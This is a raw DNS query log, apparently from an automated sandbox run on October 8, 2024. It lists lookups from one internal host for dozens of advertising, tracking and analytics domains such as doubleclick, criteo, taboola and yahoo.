                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.453668118 CEST192.168.2.41.1.1.10x936aStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.453823090 CEST192.168.2.41.1.1.10x1ec3Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.645092964 CEST192.168.2.41.1.1.10xbc5eStandard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.645210028 CEST192.168.2.41.1.1.10xb305Standard query (0)www.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.110374928 CEST192.168.2.41.1.1.10xfab9Standard query (0)id.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.110501051 CEST192.168.2.41.1.1.10x5743Standard query (0)id.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.128056049 CEST192.168.2.41.1.1.10x2bb1Standard query (0)dis.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.128257990 CEST192.168.2.41.1.1.10x9582Standard query (0)dis.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.198695898 CEST192.168.2.41.1.1.10xa93dStandard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.199074984 CEST192.168.2.41.1.1.10x283aStandard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.203969002 CEST192.168.2.41.1.1.10x4cc0Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.204114914 CEST192.168.2.41.1.1.10x9cfdStandard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.213350058 CEST192.168.2.41.1.1.10x5dd8Standard query (0)contextual.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.213465929 CEST192.168.2.41.1.1.10x553fStandard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.217735052 CEST192.168.2.41.1.1.10xd485Standard query (0)cs.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.217910051 CEST192.168.2.41.1.1.10x474eStandard query (0)cs.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.223098993 CEST192.168.2.41.1.1.10x984fStandard query (0)id.a-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.223270893 CEST192.168.2.41.1.1.10x1476Standard query (0)id.a-mx.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.234380960 CEST192.168.2.41.1.1.10x97d1Standard query (0)rtb.mfadsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.234713078 CEST192.168.2.41.1.1.10xd078Standard query (0)rtb.mfadsrvr.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.281107903 CEST192.168.2.41.1.1.10xac5aStandard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.281611919 CEST192.168.2.41.1.1.10xdd9Standard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.291568041 CEST192.168.2.41.1.1.10xfbaStandard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.291744947 CEST192.168.2.41.1.1.10xf706Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.403100967 CEST192.168.2.41.1.1.10xe738Standard query (0)geo.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.403248072 CEST192.168.2.41.1.1.10x7a67Standard query (0)geo.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.427833080 CEST192.168.2.41.1.1.10xf54dStandard query (0)ow.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.428383112 CEST192.168.2.41.1.1.10x22abStandard query (0)ow.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.463115931 CEST192.168.2.41.1.1.10xd1e2Standard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.463260889 CEST192.168.2.41.1.1.10xa035Standard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.558674097 CEST192.168.2.41.1.1.10x2a45Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.558862925 CEST192.168.2.41.1.1.10x9118Standard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.573568106 CEST192.168.2.41.1.1.10x1806Standard query (0)prebid.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.573694944 CEST192.168.2.41.1.1.10xf94cStandard query (0)prebid.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.613565922 CEST192.168.2.41.1.1.10xe58cStandard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.613792896 CEST192.168.2.41.1.1.10x70eaStandard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.887204885 CEST192.168.2.41.1.1.10xcd39Standard query (0)ce.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.887330055 CEST192.168.2.41.1.1.10x4898Standard query (0)ce.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.439671040 CEST192.168.2.41.1.1.10x2191Standard query (0)sync.targeting.unrulymedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.439814091 CEST192.168.2.41.1.1.10x81c6Standard query (0)sync.targeting.unrulymedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.460073948 CEST192.168.2.41.1.1.10x4df4Standard query (0)pippio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.460263014 CEST192.168.2.41.1.1.10x2e2dStandard query (0)pippio.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.485806942 CEST192.168.2.41.1.1.10x3c0dStandard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.486133099 CEST192.168.2.41.1.1.10xec47Standard query (0)capi.connatix.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.486767054 CEST192.168.2.41.1.1.10x8c0dStandard query (0)image4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.486993074 CEST192.168.2.41.1.1.10x7fa6Standard query (0)image4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.519292116 CEST192.168.2.41.1.1.10x9d67Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.519417048 CEST192.168.2.41.1.1.10xe45aStandard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.608165026 CEST192.168.2.41.1.1.10x6aaStandard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.608290911 CEST192.168.2.41.1.1.10x1ea5Standard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.129379988 CEST192.168.2.41.1.1.10x15c8Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.129544973 CEST192.168.2.41.1.1.10x3817Standard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.178930998 CEST192.168.2.41.1.1.10xeb2cStandard query (0)live.primis.techA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.179052114 CEST192.168.2.41.1.1.10x2c14Standard query (0)live.primis.tech65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.237869978 CEST192.168.2.41.1.1.10xf56dStandard query (0)secure.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.238013983 CEST192.168.2.41.1.1.10xf2e8Standard query (0)secure.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.261080980 CEST192.168.2.41.1.1.10x6b8cStandard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.261200905 CEST192.168.2.41.1.1.10xb719Standard query (0)capi.connatix.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.375732899 CEST192.168.2.41.1.1.10xcd63Standard query (0)ce.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.376005888 CEST192.168.2.41.1.1.10x32afStandard query (0)ce.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.678339005 CEST192.168.2.41.1.1.10x3983Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.678689957 CEST192.168.2.41.1.1.10x8592Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.031661987 CEST192.168.2.41.1.1.10x4cabStandard query (0)pb-am.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.031784058 CEST192.168.2.41.1.1.10x60baStandard query (0)pb-am.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.691939116 CEST192.168.2.41.1.1.10x3d0aStandard query (0)rtb.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.692071915 CEST192.168.2.41.1.1.10x7ad5Standard query (0)rtb.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.695509911 CEST192.168.2.41.1.1.10x10c9Standard query (0)sync.intentiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.695748091 CEST192.168.2.41.1.1.10x5e8aStandard query (0)sync.intentiq.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.483881950 CEST192.168.2.41.1.1.10x1c85Standard query (0)yahoo-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.484066010 CEST192.168.2.41.1.1.10xe6a8Standard query (0)yahoo-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.736964941 CEST192.168.2.41.1.1.10xa7caStandard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.737135887 CEST192.168.2.41.1.1.10x345eStandard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.782800913 CEST192.168.2.41.1.1.10x115eStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.782924891 CEST192.168.2.41.1.1.10x48c9Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.806145906 CEST192.168.2.41.1.1.10xfc5aStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.806307077 CEST192.168.2.41.1.1.10x7bdbStandard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.807843924 CEST192.168.2.41.1.1.10x2aaStandard query (0)gps-aa.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.810314894 CEST192.168.2.41.1.1.10x4d50Standard query (0)gps-aa.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.932821035 CEST192.168.2.41.1.1.10xee2fStandard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.932821035 CEST192.168.2.41.1.1.10x3beeStandard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.002964973 CEST192.168.2.41.1.1.10x6073Standard query (0)c1.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.003077984 CEST192.168.2.41.1.1.10x8ddcStandard query (0)c1.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.117383003 CEST192.168.2.41.1.1.10x68aeStandard query (0)tg.socdm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.117383003 CEST192.168.2.41.1.1.10xbdecStandard query (0)tg.socdm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.126756907 CEST192.168.2.41.1.1.10x82b7Standard query (0)creativecdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.126955032 CEST192.168.2.41.1.1.10x9c06Standard query (0)creativecdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.462770939 CEST192.168.2.41.1.1.10xab11Standard query (0)ssum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.462904930 CEST192.168.2.41.1.1.10x1d18Standard query (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.634548903 CEST192.168.2.41.1.1.10xbd21Standard query (0)cs.emxdgt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.635521889 CEST192.168.2.41.1.1.10xf19cStandard query (0)cs.emxdgt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.860805988 CEST192.168.2.41.1.1.10x948eStandard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.861118078 CEST192.168.2.41.1.1.10xae28Standard query (0)usersync.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.576235056 CEST192.168.2.41.1.1.10x9292Standard query (0)gum.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.576841116 CEST192.168.2.41.1.1.10xdc79Standard query (0)gum.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.856487989 CEST192.168.2.41.1.1.10xf913Standard query (0)match.deepintent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.856709957 CEST192.168.2.41.1.1.10x49ebStandard query (0)match.deepintent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.863929033 CEST192.168.2.41.1.1.10x8c5eStandard query (0)dsp.nrich.aiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.864197969 CEST192.168.2.41.1.1.10xd9a6Standard query (0)dsp.nrich.ai65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.099037886 CEST192.168.2.41.1.1.10x438fStandard query (0)pa.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.099169970 CEST192.168.2.41.1.1.10x2fb6Standard query (0)pa.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.100413084 CEST192.168.2.41.1.1.10xc94dStandard query (0)i.clean.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.100549936 CEST192.168.2.41.1.1.10x62aStandard query (0)i.clean.gg65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.238629103 CEST192.168.2.41.1.1.10xa2c0Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.238792896 CEST192.168.2.41.1.1.10xcd15Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.336618900 CEST192.168.2.41.1.1.10x896eStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.336833000 CEST192.168.2.41.1.1.10x348dStandard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.337980986 CEST192.168.2.41.1.1.10x27d0Standard query (0)sync.intentiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.338089943 CEST192.168.2.41.1.1.10x6247Standard query (0)sync.intentiq.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.352531910 CEST192.168.2.41.1.1.10xa26bStandard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.352916002 CEST192.168.2.41.1.1.10xbd44Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.468238115 CEST192.168.2.41.1.1.10xc8daStandard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.468672037 CEST192.168.2.41.1.1.10x6fc0Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.720238924 CEST192.168.2.41.1.1.10xb459Standard query (0)match.sharethrough.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.720388889 CEST192.168.2.41.1.1.10x31e2Standard query (0)match.sharethrough.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.867733955 CEST192.168.2.41.1.1.10xdb81Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.868134022 CEST192.168.2.41.1.1.10xaf08Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.887881041 CEST192.168.2.41.1.1.10x8d74Standard query (0)bh.contextweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.888065100 CEST192.168.2.41.1.1.10x6cStandard query (0)bh.contextweb.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.975049973 CEST192.168.2.41.1.1.10x3a2Standard query (0)match.deepintent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.975187063 CEST192.168.2.41.1.1.10xc8Standard query (0)match.deepintent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.188435078 CEST192.168.2.41.1.1.10x6745Standard query (0)ssbsync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.188719034 CEST192.168.2.41.1.1.10x60efStandard query (0)ssbsync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.207601070 CEST192.168.2.41.1.1.10x852fStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.207741022 CEST192.168.2.41.1.1.10xc548Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.211349964 CEST192.168.2.41.1.1.10xf7c6Standard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.211486101 CEST192.168.2.41.1.1.10x4d1aStandard query (0)usersync.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.961500883 CEST192.168.2.41.1.1.10x6440Standard query (0)cdn.indexww.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.961630106 CEST192.168.2.41.1.1.10x60beStandard query (0)cdn.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.212887049 CEST192.168.2.41.1.1.10xee9fStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.213022947 CEST192.168.2.41.1.1.10xcf33Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.474906921 CEST192.168.2.41.1.1.10xfe7eStandard query (0)cms.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.475316048 CEST192.168.2.41.1.1.10x4d50Standard query (0)cms.quantserve.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.514873028 CEST192.168.2.41.1.1.10x6af8Standard query (0)sync.serverbid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.515005112 CEST192.168.2.41.1.1.10xed16Standard query (0)sync.serverbid.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.517047882 CEST192.168.2.41.1.1.10x9760Standard query (0)data.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.517369986 CEST192.168.2.41.1.1.10x1157Standard query (0)data.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.519201040 CEST192.168.2.41.1.1.10xf3a1Standard query (0)cs.krushmedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.519503117 CEST192.168.2.41.1.1.10x8111Standard query (0)cs.krushmedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.960618973 CEST192.168.2.41.1.1.10x5d35Standard query (0)i.clean.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.960737944 CEST192.168.2.41.1.1.10xd0c2Standard query (0)i.clean.gg65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.352650881 CEST192.168.2.41.1.1.10x17e9Standard query (0)i.clean.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.353517056 CEST192.168.2.41.1.1.10x5a3eStandard query (0)i.clean.gg65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.567687035 CEST192.168.2.41.1.1.10x33ebStandard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.568061113 CEST192.168.2.41.1.1.10x83a9Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.660485029 CEST192.168.2.41.1.1.10xfb84Standard query (0)ssp.disqus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.660751104 CEST192.168.2.41.1.1.10x4bb1Standard query (0)ssp.disqus.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.040812016 CEST192.168.2.41.1.1.10x31acStandard query (0)trc-events.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.041023970 CEST192.168.2.41.1.1.10xaafStandard query (0)trc-events.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.364526987 CEST192.168.2.41.1.1.10x8976Standard query (0)api.taboola.comA (IP address)IN (0x0001)false
